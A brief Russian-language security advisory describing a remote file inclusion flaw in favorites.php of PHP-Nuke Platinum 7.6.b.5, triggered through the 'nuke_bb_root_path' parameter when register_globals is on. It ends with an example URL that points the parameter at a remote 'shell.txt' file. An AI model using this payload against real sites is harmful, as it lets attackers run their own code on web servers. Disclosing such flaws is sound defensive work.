Программа: PHP-Nuke Platinum 7.6.b.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «nuke_bb_root_path» сценарием favorites.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.

Пример:

http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/ Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?



Оставить мнение